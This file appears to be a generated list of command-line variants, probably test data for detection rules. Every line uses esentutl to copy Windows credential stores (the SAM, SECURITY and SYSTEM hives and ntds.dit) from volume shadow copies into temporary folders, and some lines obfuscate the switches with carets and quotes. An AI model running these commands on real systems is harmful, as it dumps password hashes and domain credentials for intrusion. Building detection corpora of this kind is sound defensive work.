%windir%\system32\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe '/vss' /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /vss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m "%TEMP%\sam.bak" /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /vss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Perflogs\sys.hive /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y "%SystemRoot%\System32\config\RegBack\security"
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:/Windows/repair/system
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:\windows\ntds\ntds.dit
%windir%\system32\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
%windir%\system32\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /v^ss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /vss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /vss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /vss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
%windir%\system32\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
%windir%\system32\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" '/vss'
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /v^ss
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /vss
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive '/vss'
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /v^ss
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /vss
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit '/vss'
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /v^ss
%windir%\system32\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /vss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" '/vss'
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /v^ss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /vss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive '/vss'
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /v^ss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /vss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit '/vss'
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /v^ss
%windir%\system32\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /vss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" '/vss'
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /v^ss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /vss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive '/vss'
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /v^ss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /vss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit '/vss'
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /v^ss
%windir%\system32\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /vss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" '/vss'
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /v^ss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /vss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive '/vss'
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /v^ss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /vss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit '/vss'
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /v^ss
%windir%\system32\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /vss
C:\Windows\SysNative\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe '/vss' /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe '/vss' /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe '/vss' /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /vss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /vss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m "%TEMP%\sam.bak" /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /vss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /vss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Perflogs\sys.hive /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y "%SystemRoot%\System32\config\RegBack\security"
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:/Windows/repair/system
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y C:\windows\ntds\ntds.dit
C:\Windows\SysNative\esentutl.exe /m C:\Temp\ntds_backup.dit /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
C:\Windows\SysNative\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /v^ss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /v^ss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /v^ss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /v^ss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /vss /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /vss /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /vss /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /vss /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /vss /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
C:\Windows\SysNative\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
C:\Windows\SysNative\esentutl.exe /vss /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" '/vss'
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /v^ss
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak" /vss
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive '/vss'
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /v^ss
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive /vss
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit '/vss'
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /v^ss
C:\Windows\SysNative\esentutl.exe /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit /vss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" '/vss'
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /v^ss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m "%TEMP%\sam.bak" /vss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive '/vss'
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /v^ss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Perflogs\sys.hive /vss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit '/vss'
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /v^ss
C:\Windows\SysNative\esentutl.exe /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit /vss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" '/vss'
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /v^ss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak" /vss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive '/vss'
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /v^ss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive /vss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit '/vss'
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /v^ss
C:\Windows\SysNative\esentutl.exe /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit /vss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" '/vss'
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /v^ss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak" /vss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive '/vss'
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /v^ss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive /vss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit '/vss'
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /v^ss
C:\Windows\SysNative\esentutl.exe /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit /vss
ESENTUTL '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m "%TEMP%\sam.bak"
ESENTUTL '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Perflogs\sys.hive
ESENTUTL '/vss' /y "%SystemRoot%\System32\config\RegBack\security" /m C:\Temp\ntds_backup.dit
ESENTUTL '/vss' /y C:/Windows/repair/system /m "%TEMP%\sam.bak"
ESENTUTL '/vss' /y C:/Windows/repair/system /m C:\Perflogs\sys.hive
ESENTUTL '/vss' /y C:/Windows/repair/system /m C:\Temp\ntds_backup.dit
ESENTUTL '/vss' /y C:\windows\ntds\ntds.dit /m "%TEMP%\sam.bak"
ESENTUTL '/vss' /y C:\windows\ntds\ntds.dit /m C:\Perflogs\sys.hive
ESENTUTL '/vss' /y C:\windows\ntds\ntds.dit /m C:\Temp\ntds_backup.dit
ESENTUTL '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m "%TEMP%\sam.bak"
ESENTUTL '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Perflogs\sys.hive
ESENTUTL '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam /m C:\Temp\ntds_backup.dit
ESENTUTL /m "%TEMP%\sam.bak" '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m "%TEMP%\sam.bak" '/vss' /y C:/Windows/repair/system
ESENTUTL /m "%TEMP%\sam.bak" '/vss' /y C:\windows\ntds\ntds.dit
ESENTUTL /m "%TEMP%\sam.bak" '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m "%TEMP%\sam.bak" /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m "%TEMP%\sam.bak" /v^ss /y C:/Windows/repair/system
ESENTUTL /m "%TEMP%\sam.bak" /v^ss /y C:\windows\ntds\ntds.dit
ESENTUTL /m "%TEMP%\sam.bak" /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m "%TEMP%\sam.bak" /vss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m "%TEMP%\sam.bak" /vss /y C:/Windows/repair/system
ESENTUTL /m "%TEMP%\sam.bak" /vss /y C:\windows\ntds\ntds.dit
ESENTUTL /m "%TEMP%\sam.bak" /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m C:\Perflogs\sys.hive '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Perflogs\sys.hive '/vss' /y C:/Windows/repair/system
ESENTUTL /m C:\Perflogs\sys.hive '/vss' /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Perflogs\sys.hive '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m C:\Perflogs\sys.hive /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Perflogs\sys.hive /v^ss /y C:/Windows/repair/system
ESENTUTL /m C:\Perflogs\sys.hive /v^ss /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Perflogs\sys.hive /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m C:\Perflogs\sys.hive /vss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Perflogs\sys.hive /vss /y C:/Windows/repair/system
ESENTUTL /m C:\Perflogs\sys.hive /vss /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Perflogs\sys.hive /vss /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m C:\Temp\ntds_backup.dit '/vss' /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Temp\ntds_backup.dit '/vss' /y C:/Windows/repair/system
ESENTUTL /m C:\Temp\ntds_backup.dit '/vss' /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Temp\ntds_backup.dit '/vss' /y \\127.0.0.1\C$\Windows\System32\config\sam
ESENTUTL /m C:\Temp\ntds_backup.dit /v^ss /y "%SystemRoot%\System32\config\RegBack\security"
ESENTUTL /m C:\Temp\ntds_backup.dit /v^ss /y C:/Windows/repair/system
ESENTUTL /m C:\Temp\ntds_backup.dit /v^ss /y C:\windows\ntds\ntds.dit
ESENTUTL /m C:\Temp\ntds_backup.dit /v^ss /y \\127.0.0.1\C$\Windows\System32\config\sam
